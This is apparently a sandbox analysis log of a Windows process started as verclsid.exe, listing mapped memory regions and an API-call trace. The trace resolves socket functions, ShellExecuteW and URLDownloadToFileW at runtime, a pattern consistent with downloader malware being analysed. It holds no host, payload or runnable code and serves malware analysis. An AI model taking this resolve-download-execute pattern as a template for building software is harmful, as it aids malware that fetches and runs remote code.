end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 2378
start_va = 0x1d30000
end_va = 0x1d33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2379
start_va = 0x24d0000
end_va = 0x2535fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2380
start_va = 0x1dc0000
end_va = 0x1dcdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2381
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2382
start_va = 0x1dd0000
end_va = 0x1dd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001dd0000"
filename = ""
Region:
id = 3129
start_va = 0x1de0000
end_va = 0x1de0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001de0000"
filename = ""
Region:
id = 3130
start_va = 0x2280000
end_va = 0x2283fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 3131
start_va = 0x22b0000
end_va = 0x232ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 3193
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 3194
start_va = 0x2600000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3195
start_va = 0x2680000
end_va = 0x278ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3196
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 3197
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 3198
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3199
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 3686
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 3687
start_va = 0x2790000
end_va = 0x289ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 3688
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 3691
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 3692
start_va = 0x2600000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3693
start_va = 0x26d0000
end_va = 0x282ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 3694
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 3695
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 3696
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3697
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 3698
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 3699
start_va = 0x2600000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3700
start_va = 0x26c0000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 3701
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3702
start_va = 0x2600000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3703
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Thread:
id = 111
os_tid = 0x390
[0382.735] GetCurrentThreadId () returned 0x390
[0382.735] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x2178b0
[0382.737] SetThreadLocale (Locale=0x400) returned 1
[0382.739] GetVersion () returned 0x1db10106
[0382.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.739] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadPreferredUILanguages") returned 0x77664fd0
[0382.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.739] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadPreferredUILanguages") returned 0x77663d40
[0382.740] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.740] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadUILanguage") returned 0x776abba0
[0382.740] GetSystemInfo (in: lpSystemInfo=0x1cd9a0 | out: lpSystemInfo=0x1cd9a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0382.740] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.740] GetStartupInfoW (in: lpStartupInfo=0x1cd968 | out: lpStartupInfo=0x1cd968*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0382.740] GetACP () returned 0x4e4
[0382.740] GetCurrentThreadId () returned 0x390
[0382.740] GetVersion () returned 0x1db10106
[0382.741] GetVersionExW (in: lpVersionInformation=0x1cd8bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfd92bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀挀∀) | out: lpVersionInformation=0x1cd8bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0382.741] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef78f0000
[0382.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.750] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1e70000
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0382.751] GetProcAddress (hModule=0x7fef78f0000, lpProcName="closesocket") returned 0x7feffa118e0
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="select") returned 0x7feffa14da0
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1fa8d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="recvfrom") returned 0x7fef78f17ac
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="sendto") returned 0x7feffa1d7f0
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1fa8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="inet_addr") returned 0x7feffa11350
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1fa8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="htons") returned 0x7feffa11250
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="setsockopt") returned 0x7fef78f1664
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSAStartup") returned 0x7feffa14980
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="socket") returned 0x7feffa1de90
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSACleanup") returned 0x7feffa14cc0
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1fa8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="gethostbyname") returned 0x7feffa18df0
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1fa8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="send") returned 0x7feffa18000
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1fa8d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="connect") returned 0x7feffa145c0
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1fa8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="recv") returned 0x7fef78f1744
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="gethostname") returned 0x7feffa1ae20
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1fa8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="inet_ntoa") returned 0x7feffa1d9a0
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1fa8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="ntohs") returned 0x7feffa11250
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1fa8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSAGetLastError") returned 0x7feffa11290
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="getpeername") returned 0x7feffa3e450
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="getsockname") returned 0x7feffa19480
[0382.756] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0382.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0382.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1fa8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0382.766] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="ShellExecuteW") returned 0x7fefe20983c
[0382.767] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7fefdba0000
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0382.794] GetProcAddress (hModule=0x7fefdba0000, lpProcName="URLDownloadToFileW") returned 0x7fefdc395e4
[0382.794] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0382.794] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7feff630000
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0382.795] GetProcAddress (hModule=0x7feff630000, lpProcName="StrRetToStrW") returned 0x7feff641078
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0382.795] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe218660
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1fa8d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0382.796] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe27a274
